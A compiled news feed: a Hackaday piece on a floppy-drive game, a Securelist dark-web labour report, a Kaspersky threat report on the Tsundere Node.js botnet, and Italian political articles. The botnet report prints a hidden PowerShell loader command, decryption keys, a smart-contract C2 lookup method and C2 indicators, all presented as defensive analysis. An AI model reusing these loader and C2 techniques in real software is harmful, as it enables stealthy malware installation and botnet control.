There’s a tactile joy to the humble 3.5″ floppy that no USB stick will ever match. It’s not just the way they thunk into place in a well-made drive, the eject button, too, is a tactile experience not to be missed. If you were a child in disk-drive days, you may have popped a disk in-and-out repeatedly just for the fun of it — and if you weren’t a child, and did it anyway, we’re not going to judge. [igor] has come up with a physical game called “Floppy Flopper” that provides an excuse to do just that en masse, and it looks like lots of fun.

It consists of nine working floppy drives in a 3×3 grid, all mounted on a hefty welded-steel frame. Each drive has an RGB LED above it. The name of the game is to swap floppies as quickly as possible so that the color of the floppy in the drive matches the color flashing above it. Each successful insertion is worth thirteen points, tracked on a lovely matrix display. Each round is faster than the last, until you miss the window or mix up colors in haste. That might make more sense if you watch the demo video below.

[igor] could have easily faked this with NFC tags, as we’ve seen floppy-like interfaces do, or perhaps just use a color sensor. But no, those nine drives are all in working order. In the interest of speed — this is a timed challenge, after all, and we don’t need a PC slowing it down — each floppy is given its own microcontroller. Rather than reading data off the disk, only the disk’s write-protect and density holes are checked. He’s only using R, G, and B for floppy colors, so those four bits are enough. Unfortunately [igor]’s collection of floppies is very professional — lots of black and grey — so he needed to use colored stickers instead of technicolor plastic.

The project is open source, if you happen to have a stack of floppy drives of your own. If you don’t, but still want to play, the area, the Floppy Flopper is being exhibited at RADIONA in Rijeka, Croatia until December 5th 2025. If you happen to be in the neighborhood, it might be worth a trip.

If we had a nickle for every physical game that used a floppy drive, we’d have two nickles just this year. Which isn’t a lot, but it’s kind of neat to see so long after the last diskettes came off the production lines.

youtube.com/embed/wWfkXNIbJLw?…

hackaday.com/2025/11/20/disket…

In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.

So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.

The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.

While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.

Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.

In this report, you’ll find:

• Demographics of the dark web job seekers
• Their job preferences
• Top specializations on the dark web
• Job salaries
• Comparison between legal and shadow job markets

Read the full report (English, PDF)

securelist.com/dark-web-job-ma…

Introduction

Tsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat with previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval method and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node Package Manager (npm) to deliver the payload. The packages were named similarly to popular packages, employing a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js, and various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack affected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat actor abandoned this infection method after being detected.

The threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2 panel. This botnet is currently expanding and poses an active threat to Windows users.

Initial infection

Currently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one documented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which downloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest that the implants are being disseminated using the lure of popular Windows games, particularly first-person shooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be attempts to capitalize on the popularity of these games among piracy communities.

Malware implants

According to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a PowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure section).

MSI installer

The MSI installer was often disguised as a fake installer for popular games and other software to lure new victims. Notably, at the time of our research, it had a very low detection rate.
The installer contains a list of data and JavaScript files that are updated with each new build, as well as the necessary Node.js executables to run these scripts. The following is a list of files included in the sample:
nodejs/B4jHWzJnlABB2B7
nodejs/UYE20NBBzyFhqAQ.js
nodejs/79juqlY2mETeQOc
nodejs/thoJahgqObmWWA2
nodejs/node.exe
nodejs/npm.cmd
nodejs/npx.cmd
The last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the user’s AppData\Local\nodejs directory.

An examination of the CustomAction table reveals the process by which Windows Installer executes the malware and installs the Tsundere bot:
RunModulesSetup 1058 NodeDir powershell -WindowStyle Hidden -NoLogo -enc JABuAG[...]ACkAOwAiAA==
After Base64 decoding, the command appears as follows:
$nodePath = "$env:LOCALAPPDATA\nodejs\node.exe";
& $nodePath - e "const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA + '\\nodejs\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd: __dirname }).unref();"
This will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this case, B4jHWzJnlABB2B7). The resulting child process runs in the background, remaining hidden from the user.

Loader script

The loader script is responsible for ensuring the correct decryption and execution of the main bot script, which handles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript files, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate the unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC cryptographic algorithm with a build-specific key and nonce, and saves the decrypted files under different filenames.
encScriptPath = 'thoJahgqObmWWA2',
encConfigPath = '79juqlY2mETeQOc',
decScript = 'uB39hFJ6YS8L2Fd',
decConfig = '9s9IxB5AbDj4Pmw',
keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',
ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',
[...]
const h = path.dirname(encScriptPath),
i = path.join(h, decScript),
j = path.join(h, decConfig)
decryptFile(encScriptPath, i, key, iv)
decryptFile(encConfigPath, j, key, iv)
The configuration file is a JSON that defines a directory and file structure, as well as file contents, which the malware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and deploy the Node.js package manager (npm) without requiring manual installation or downloading. The unpackaging script is responsible for recreating this structure, including the node_modules directory with all its libraries, which contains packages necessary for the malware to run.

With the environment now set up, the malware proceeds to install three packages to the node_modules directory using npm:

• ws: a WebSocket networking library
• ethers: a library for communicating with Ethereum
• pm2: a Node.js process management tool

Loader script installing the necessary toolset for Tsundere persistence and execution

The pm2 package is installed to ensure the Tsundere bot remains active and used to launch the bot. Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.

PowerShell infector

The PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a configuration file and an unpacker — as done with the MSI installer — it downloads the ZIP file node-v18.17.0-win-x64.zip from the official Node.js website nodejs[.]org and extracts it to the AppData\Local\NodeJS directory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm to decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script. These decrypted files, along with a package.json file are written to the disk. The package.json file contains information about the malicious Node.js package, as well as the necessary libraries to be installed, including the ws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script that is followed by the bot script.

The PowerShell infector creates a package file with the implant dependencies

Persistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the HKCU:\Software\Microsoft\Windows\CurrentVersion\Run registry key that points to itself. It then overwrites itself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on each login by spawning a new instance of the bot.

Tsundere bot

We will now delve into the Tsundere bot, examining its communication with the command-and-control (C2) server and its primary functionality.

C2 address retrieval

Web3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These contracts can store data in variables, which can be modified by functions defined within the contract. In this case, the Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is defined to modify the state variable param1, allowing it to store a string. The string stored in param1 is used by the Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are immutable once written to the Ethereum blockchain.
The Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:

• Wallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32
• Contract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b

In order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new address. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.

Smart contract containing the Tsundere botnet WebSocket C2

The state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is stored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2 server address: ws[:]//185.28.119[.]179:1234.

To obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC) APIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function named fetchAndUpdateIP, which iterates through a list of RPC providers. For each provider, it checks the transactions associated with the contract address and wallet owner, and then retrieves the string from the state variable containing the WebSocket address, as previously observed.

Malware code for retrieval of C2 from the smart contract

The Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid WebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first checks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS region. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket, setting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed sockets.

Bot handlers for communication

Communication

The communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:

1. The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.
2. An AES key is transmitted immediately after the connection is established.
3. The bot sends an empty string to confirm receipt of the key.
4. The server then sends a nonce (IV), enabling the use of encrypted communication from that point on.
   Encryption is required for all subsequent communication.
5. The bot transmits the OS information of the infected machine, including the MAC address, total memory, GPU information, and other details. This information is also used to generate a unique identifier (UUID).
6. The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s presence.
7. With the connection established, the client and server can exchange information freely.
   
   1. To maintain the connection, keep-alive messages are sent every minute using ping/pong messages.
   2. The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous communication.

   
   

Tsundere communication process with the C2 via WebSockets

The connections are not authenticated through any additional means, making it possible for a fake client to establish a connection.

As previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns a pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently active bots.

Functionality

The Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a message with ID=1 to the bot, the message is evaluated as a new function and then executed. The result of this operation is sent back to the server via a custom function named serverSend, which is responsible for transmitting the result as a JSON object, encrypted for secure communication.

Tsundere bot evaluation code once functions are received from the C2

The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions.

However, during our observation period, we did not receive any commands or functions from the C2 server, possibly because the newly connected bot needed to be requested by other threat actors through the botnet panel before it could be utilized.

Infrastructure

The Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As mentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at 185.28.119[.]179, and our tests indicated that it was responding positively to bot connections.

The following table lists the IP addresses and ports extracted from the provided list of URLs:

Marketplace and control panel

No business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The Tsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.

Tsundere botnet panel login

The notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open registration system. Any user who accesses the login form can register and gain access to the panel, which features various tabs:

• Bots: a dashboard displaying the number of bots under the user’s control
• Settings: user settings and administrative functions
• Build: if the user has an active license, they can create new bots using the two previously mentioned methodologies (MSI or PowerShell)
• Market: this is the most interesting aspect of the panel, as it allows users to promote their individual bots and offer various services and functionalities to other threat actors. Each build can create a bot that performs a specific set of actions, which can then be offered to others
• Monero wallet: a wallet service that enables users to make deposits or withdrawals
• Socks proxy: a feature that allows users to utilize their bots as proxies for their traffic

Tsundere botnet control panel, building system and market

Each build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon infection. This build ID can be linked to the user who created it. According to our research and analysis of other URLs found in the wild, builds are created through the panel and can be downloaded via the URL:
hxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.
At the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any given time.

Attribution

Based on the text found in the implants, we can conclude with high confidence that the threat actor behind the Tsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with previous attacks attributed to the same threat actor.

Russian being used throughout the code

Furthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based stealer available on the shadow market for $120 per month. This connection is based on the fact that both panels share the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the subdomain “idk.” is used for the Tsundere botnet panel.

123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author

By examining the available evidence, we can link both threats to a Russian-speaking threat actor known as “koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as other malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly related to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used PowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured the title “node malware senior”, further suggesting their expertise in Node.js-based malware.

Conclusion

The Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset. The Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new strategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat.
Additionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as “smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet infrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123 Stealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result, it is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.

Indicators of compromise

More IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

File hashes
235A93C7A4B79135E4D3C220F9313421
760B026EDFE2546798CDC136D0A33834
7E70530BE2BFFCFADEC74DE6DC282357
5CC5381A1B4AC275D221ECC57B85F7C3
AD885646DAEE05159902F32499713008
A7ED440BB7114FAD21ABFA2D4E3790A0
7CF2FD60B6368FBAC5517787AB798EA2
E64527A9FF2CAF0C2D90E2238262B59A
31231FD3F3A88A27B37EC9A23E92EBBC
FFBDE4340FC156089F968A3BD5AA7A57
E7AF0705BA1EE2B6FBF5E619C3B2747E
BFD7642671A5788722D74D62D8647DF9
8D504BA5A434F392CC05EBE0ED42B586
87CE512032A5D1422399566ECE5E24CF
B06845C9586DCC27EDBE387EAAE8853F
DB06453806DACAFDC7135F3B0DEA4A8F

File paths
%APPDATA%\Local\NodeJS

Domains and IPs
ws://185.28.119[.]179:1234
ws://196.251.72[.]192:1234
ws://103.246.145[.]201:1234
ws://193.24.123[.]68:3011
ws://62.60.226[.]179:3001

Cryptocurrency wallets
Note: These are wallets that have changed the C2 address in the smart contract since it was created.
0x73625B6cdFECC81A4899D221C732E1f73e504a32
0x10ca9bE67D03917e9938a7c28601663B191E4413
0xEc99D2C797Db6E0eBD664128EfED9265fBE54579
0xf11Cb0578EA61e2EDB8a4a12c02E3eF26E80fc36
0xdb8e8B0ef3ea1105A6D84b27Fc0bAA9845C66FD7
0x10ca9bE67D03917e9938a7c28601663B191E4413
0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84
0x46b0f9bA6F1fb89eb80347c92c9e91BDF1b9E8CC

securelist.com/tsundere-node-j…

Every Thursday of the week, Bastian’s Night is broadcast from 21:30 CEST (new time).

Bastian’s Night is a live talk show in German with lots of music, a weekly round-up of news from around the world, and a glimpse into the host’s crazy week in the pirate movement.

If you want to read more about @BastianBB: –> This way

piratesonair.net/bastians-nigh…

La Commissione legale e per i diritti umani del partito DEM ha condannato la gestione del caso del massacro in carcere del 19 dicembre e ha affermato che l’impunità è un risultato inaccettabile. L’operazione condotta il 19 dicembre 2000, pubblicizzata come operazione “Ritorno alla Vita”, ebbe un esito grave e devastante. Persone che lo Stato era tenuto a proteggere furono uccise e ferite. Trentadue persone persero la vita, tra cui due membri delle forze di sicurezza che avevano preso parte all’operazione, e centinaia rimasero gravemente ferite.

Successivi esami forensi hanno stabilito che tutti i decessi causati da ferite da arma da fuoco, compresi quelli degli agenti di sicurezza, erano dovuti ad armi utilizzate dal personale statale. I rapporti hanno confermato che non sono stati sparati colpi dall’interno verso l’esterno. Le armi che hanno causato le morti erano armi da fuoco militari ad alta energia cinetica, armi estremamente potenti e a canna lunga.

I metodi utilizzati nel reparto femminile erano pura barbarie. Vennero aperti dei buchi nel tetto e materiale incendiario fu lanciato nei dormitori. Agenti incendiari a base chimica, proibiti all’uso in spazi chiusi, furono rilasciati in grandi quantità provocando l’incendio dei reparti e rendendo impossibile respirare alle prigioniere. Quando le detenute, rendendosi conto che sarebbero state uccise, tentarono di raggiungere il cortile, furono colpite anche lì. Sei persone persero la vita in questo attacco.

Nonostante le istanze e le denunce presentate, furono avviati procedimenti contro le vittime, mentre non fu concessa alcuna autorizzazione a procedere contro gli agenti coinvolti nell’operazione. L’indagine fu deliberatamente protratta fino al 2010.

Quell’anno furono infine presentate accuse contro 37 coscritti, ma non contro alcun ufficiale di grado superiore. L’avvio tardivo del procedimento contro coloro che avevano comandato l’operazione non ne alterò l’esito. Il tribunale respinse le richieste di audizione personale degli imputati e di deposizione di persona di vittime e testimoni. Le dichiarazioni sono rimaste incomplete per anni. La mancata presentazione dei documenti e delle informazioni richiesti dal tribunale ha intenzionalmente prolungato il processo per molti anni. Alla fine il caso è stato archiviato per prescrizione.

Tuttavia, secondo la giurisprudenza consolidata della Corte europea dei diritti dell’uomo (CEDU), la prescrizione non può essere invocata quando i ritardi sono causati dalle autorità giudiziarie o dai funzionari statali. I crimini che possono essere considerati crimini contro l’umanità non possono essere conclusi impunemente, poiché ciò viola sia la legge sia i principi normativi fondamentali che sostengono i diritti umani.

Per queste ragioni, la CEDU ha stabilito il 15 novembre 2016,nel caso Hamdemir e altri contro la Turchia, che la forza e i metodi utilizzati nel carcere di Bayrampaşa erano sproporzionati e che il diritto alla vita era stato violato. Inoltre, lo Stato non aveva rispettato le Regole minime standard delle Nazioni Unite per il trattamento dei detenuti, di cui è parte.

La perdita di diritti causata dalle politiche carcerarie dello Stato e il fatto che un altro massacro abbia portato all’impunità sono inaccettabili. Respingiamo l’archiviazione dell’ultimo caso riguardante le operazioni simultanee condotte in 20 carceri, il caso del raid nel carcere di Bayrampaşa, attraverso l’applicazione della prescrizione e il conseguente esito di impunità.”

L'articolo Partito Dem: il caso della strage in carcere non può concludersi impunito proviene da Retekurdistan.it.

Piccolo spazio promozionale pre-natalizio per un'artista indipendente e attivista LGBTQ+ (ma per niente "social"... anche se le dico sempre che sul Fediverso si troverebbe bene...)

Cinzia è attrice e speaker/voiceover artist e ha uno shop di prodotti parlanti!

Su PrintedVOICE trovate magliette, felpe, shopper, tazze, borracce... su ognuna delle quali c'è un QR che rimanda a una clip con la sua voce.

I design sono ispirati al contenuto delle clip: le frasi più emozionanti della letteratura italiana, inglese (in inglese) e non solo (ci sono anche il francese e il latino!).

Nelle foto potete vedere qualche esempio interessante... ma vi consiglio di esplorare il sito e provare le combinazioni di colori che preferite!

Qui invece trovate un esempio delle clip che si apriranno inquadrando il QR!

E... vi consiglio di approfittare degli sconti di novembre / black friday: fino a domenica c'è il 20% di sconto, mentre il 28-29 ci sarà uno sconto speciale del 25% su ordini a partire da 70 €

Ricondivisioni molto gradite... Grazie!

printed-voice.myspreadshop.it/

Il 20 novembre alle ore 16.00, presso la Sala Nassirya del Senato, si terrà la conferenza stampa “Io Coltivo: che fine ha fatto la proposta di legge popolare?” dedicata al Disegno di Legge di iniziativa popolare S.1317 – “Depenalizzazione della coltivazione per uso personale e in forma associata della cannabis”, promosso da Meglio Legale, Associazione Coscioni, Forum Droghe e con il sostegno di oltre 70 organizzazioni.

A quasi un anno dal deposito della proposta, sostenuta da 54.000 firme, e a dieci mesi dalla sua assegnazione alle Commissioni Giustizia, Sanità e Lavoro, il Senato non ha ancora avviato l’esame del testo, violando apertamente l’Art. 74 del Regolamento.

Una mancata discussione che svilisce e di fatto denigra lo strumento della proposta di legge di iniziativa popolare, previsto dalla Costituzione per garantire ai cittadini un canale diretto di partecipazione democratica.

“Siamo da anni al fianco della battaglia per la legalizzazione della cannabis e siamo al fianco di Meglio Legale”, dichiara la Segretaria di Possibile Francesca Druetti, “con la convinzione che sia urgente e necessario togliere il mercato della cannabis dalle mani della criminalità organizzata, separarlo da quello delle droghe pesanti, trovare risorse per le casse dello Stato che possono essere investite in una corretta informazione sulle droghe e sulla sanità pubblica. Che il Parlamento non voglia nemmeno discutere una proposta firmata e condivisa da decine di migliaia di persone è un danno che la maggioranza fa non solo a noi, ma alla qualità del rapporto tra istituzioni e cittadinanza”.

In quest’ottica, Druetti ha partecipato alla Controconferenza nazionale sulle Droghe a Roma insieme alla Consigliera Regionale del Piemonte Giulia Marro, che aggiunge: “La Controconferenza è stato un luogo di confronto serio e necessario in un momento in cui le politiche governative procedono a colpi di “tolleranza zero”, senza risultati e senza ascolto.

È emerso con chiarezza quanto queste scelte – dalle oscillazioni continue sulla canapa agli interventi punitivi sulle sostanze – stiano producendo solo danni: non diminuisce l’uso, non si riduce la circolazione delle droghe, che anzi oggi sono più varie e più diffuse che mai.

Si continua a combattere battaglie simboliche, inseguendo un nemico immaginario, invece di confrontarsi con ciò che cinquant’anni di studi e pratiche ci insegnano: la repressione non funziona. Funzionano l’informazione corretta, la comunicazione trasparente, la riduzione del danno, il coinvolgimento delle persone e delle associazioni di consumatori.

Per questo considero grave che il Senato non abbia ancora avviato l’esame del DDL di iniziativa popolare sulla coltivazione domestica.

Rispettare la volontà di migliaia di cittadine e cittadini è un obbligo democratico. Continuare a rinviare la discussione significa lasciare spazio a politiche inefficaci e punitive, mentre avremmo bisogno di responsabilità, dati e prevenzione”.

Interverranno:

Antonella Soldo, presidente Meglio Legale e vicesegretaria +Europa

Marco Perduca, Associazione Luca Coscioni

Francesca Druetti, segretaria Possibile

Leonardo Fiorentini, Forum Droghe

Mattia Cusani, Canapa Sativa Italia

Denise Amerini, CGIL

Parlamentari, rappresentanti istituzionali, stampa e organizzazioni sono invitati a partecipare.

L'articolo Druetti-Marro (Possibile): Cannabis, il Senato blocca l’esame del DDL di iniziativa popolare in violazione del proprio regolamento. Conferenza stampa il 20 novembre, ore 16.00 – Sala Nassirya proviene da Possibile.

Oggi in piazza a Roma insieme a tanti amministratori e amministratrici da tutta Italia per partecipare al presidio organizzato da Alleanza Verdi e Sinistra che denuncia i tagli agli enti locali fatti dal governo Meloni.

139,5 milioni su 140 tagliati al fondo per la messa in sicurezza di scuole, strade ed edifici pubblici.

100 milioni su 200 tagliati ai fondi contro il dissesto idrogeologico.

400 milioni su 400 di taglio ai fondi per gli interventi di sviluppo sostenibile.

29,9 milioni su 30 tagliati a opere per la messa in sicurezza di edifici e strutture pubbliche.

Soldi, tantissimi soldi, tolti all’edilizia scolastica, agli edifici pubblici, al contrasto al dissesto idrogeologico, all’edilizia pubblica.

Tagli che significano la cancellazione o riduzione di servizi essenziali, di politiche per la casa, di interventi sull’efficientamento energetico, della messa in sicurezza di infrastrutture e territorio. In un paese in cui milioni persone vivono in aree a rischio idrogeologico, in cui l’emergenza abitativa dovrebbe essere in cima alle priorità di qualunque governo. Tagli che investono fondi in gran parte destinati al Mezzogiorno e alle Aree interne.

In un paese in cui l’astensionismo alle urne è un dato allarmante, il governo decide tagli che vanno a depotenziare le amministrazioni comunali, le istituzioni più vicine ai cittadini e alle cittadine, quelle che dovrebbero poter garantire servizi essenziali nella vita quotidiana delle persone, che dovrebbero essere la fondazione del rapporto tra cittadinanza e chi in sua rappresentanza amministra la cosa pubblica. Se i Comuni non hanno i mezzi per erogare questi servizi, si incrina ulteriormente la fiducia tra cittadinanza e istituzioni, si infierisce su chi è più fragile, aumentando ulteriormente le disuguaglianze, si mina la tenuta delle città e dei territori di fronte alla crisi economica, sociale, climatica.

L'articolo Basta tagli: al presidio AVS contro i tagli agli enti locali proviene da Possibile.

Ahmad Salem è un nome che alla maggior parte di noi non dice niente, ed è questo il problema.

Salem è un ragazzo palestinese, da sei mesi detenuto in regime di alta sicurezza in un carcere della nostra regione per aver denunciato il genocidio che il suo popolo stava e sta subendo per mano di Israele.
Durante l’iter per ottenere asilo politico in Italia il suo telefono è stato sequestrato e perquisito: spezzoni decontestualizzati di un video in cui invita la società civile a mobilitarsi per la Palestina sono bastati per accusarlo di “propaganda jihadista”.
Altri filmati presenti sul suo cellulare sono considerati dall’accusa “video istruttivi” di matrice terroristica. I filmati — diffusi in passato dalle principali testate giornalistiche italiane — non contengono però effettive indicazione tecniche o di addestramento.
I reati contestati a Salem — istigazione a delinquere e autoaddestramento con finalità di terrorismo — sono stati introdotti dal DDL Sicurezza, cardine della repressione del dissenso che è l’unico tratto distintivo del governo Meloni. Un provvedimento che, tramite l’introduzione di nuovi reati e l’inasprimento di pene, aggravanti e sanzioni, limita diritti e libertà fondamentali.
Salem ora va sostenuto, come lui ha tentato di fare col popolo palestinese. Dobbiamo diventare la sua voce, amplificare la sua rabbia e aggiungerci la nostra verso un governo sempre più securitario e criminalizzante.
Raccogliendo l’appello delle attiviste e degli attivisti, come @vincenzo23fullone, vi invitiamo a spezzare l’indifferenza che circonda la detenzione di Salem.

Il 21 novembre è stato organizzato un presidio di solidarietà davanti al Tribunale de L’Aquila per altri tre giovani palestinesi — Ahmad, Anan Yaeesh, Ali Irar e Mansour Doghmosh — accusati di terrorismo, in cui manifestare anche la solidarietà ad Ahmad Salem.

L'articolo Ahmad Salem libero: la mobilitazione per la Palestina non è reato proviene da Possibile.

FOR IMMEDIATE RELEASE:

President Donald Trump shamefully welcomed Saudi Crown Prince Mohammed bin Salman to the White House today. He brushed aside questions about Prince Mohammed’s role in the gruesome murder of Washington Post journalist Jamal Khashoggi, commenting that “things happen” and “You don’t have to embarrass our guest by asking a question like that.”

Freedom of the Press Foundation Director of Advocacy Seth Stern said:

“Somehow calling a female reporter ‘piggy’ was only the second-most offensive anti-press utterance to come out of the president’s mouth in recent days. And somehow Biden’s infamous fist bump is now only the second-most disgusting public display of flattery by a U.S. president to journalist-murderer Mohammed bin Salman.

“Scolding a U.S. reporter for asking questions about MBS ordering a fellow journalist to be bonesawed signals to dictators everywhere that they can murder journalists with impunity — as if Trump hadn’t already sent that message clearly enough by bankrolling and arming Israel while it does just that in Gaza.

“Today’s fiasco felt like the nail in the coffin for whatever was left of the U.S.’s global standing as a leader on press freedom. The next president is going to have their work cut out for them in rebuilding that credibility. In the meantime, judges, lawmakers, and everyone else in a position to slow the backslide need to step up and rise to the moment before more journalists get killed.”

Please contact us if you would like further comment.

freedom.press/issues/press-hat…

Today the European Commission has published two Digital Omnibus proposals, reopening the EU’s core protections against harm in the digital age. This step risks dismantling the rules-based system that was hard-won over decades, endangering the very foundation of human rights and tech policy in the EU.

The post Press Release: Commission’s Digital Omnibus is a major rollback of EU digital protections appeared first on European Digital Rights (EDRi).

Nella giornata di ieri, il Ministro dell’Interno Matteo Piantedosi ha rivolto un appello alla partecipazione al voto. Un invito che ogni rappresentante delle istituzioni ha il dovere di fare, ma che rischia di apparire contraddittorio se non accompagnato dalle misure necessarie a rendere realmente possibile l’esercizio del diritto di voto per tutte e tutti.

Ancora ad oggi, infatti, il Governo non ha introdotto una norma che consenta ai fuorisede di votare senza dover affrontare costi e disagi significativi. Sono migliaia di persone che, pur volendo partecipare, vengono di fatto ostacolate da un sistema che non tiene conto dei problemi. Studentesse e studenti, lavoratrici e lavoratori che vivono lontano dal proprio comune. Parliamo anche di persone temporaneamente domiciliate fuori sede per motivi di cura.

Il diritto di voto deve essere garantito pienamente, senza discriminazioni territoriali o economiche. È necessario introdurre subito una legge sul voto dei fuorisede: una misura di civiltà, di democrazia e di rispetto verso chi studia, lavora e contribuisce al Paese.

Chiediamo che il Governo abbandoni rinvii e ambiguità e si assuma la responsabilità di rendere l’Italia una democrazia più accessibile e inclusiva. Invitare al voto è importante; permettere davvero a tutte e tutti di votare lo è ancora di più.

L'articolo Piantedosi, faccia votare i fuorisede proviene da Possibile.

È passato un anno dall’arresto di Alberto Trentini, non si è mosso nulla.
“Sono qui dopo 365 giorni a esprimere indignazione. Per Alberto non si è fatto ciò che era doveroso fare. Sono stata troppo paziente ed educata ma ora la pazienza è finita”.
Sono le parole di Armanda Colusso, mamma dell’operatore umanitario detenuto in Venezuela da un anno senza un’accusa formale a suo carico.
L’immobilismo del governo Meloni non può essere tollerato, facciamo pressione, chiediamo che si attivi e adoperi ogni strumento diplomatico necessario alla sua liberazione.
Facciamolo per Alberto e la sua famiglia, facciamolo per la giustizia che perde valore ogni minuto che Alberto passa nella cella in cui è detenuto senza colpa.
Insistiamo.

L'articolo Alberto Trentini, dal governo un anno di silenzio intollerabile proviene da Possibile.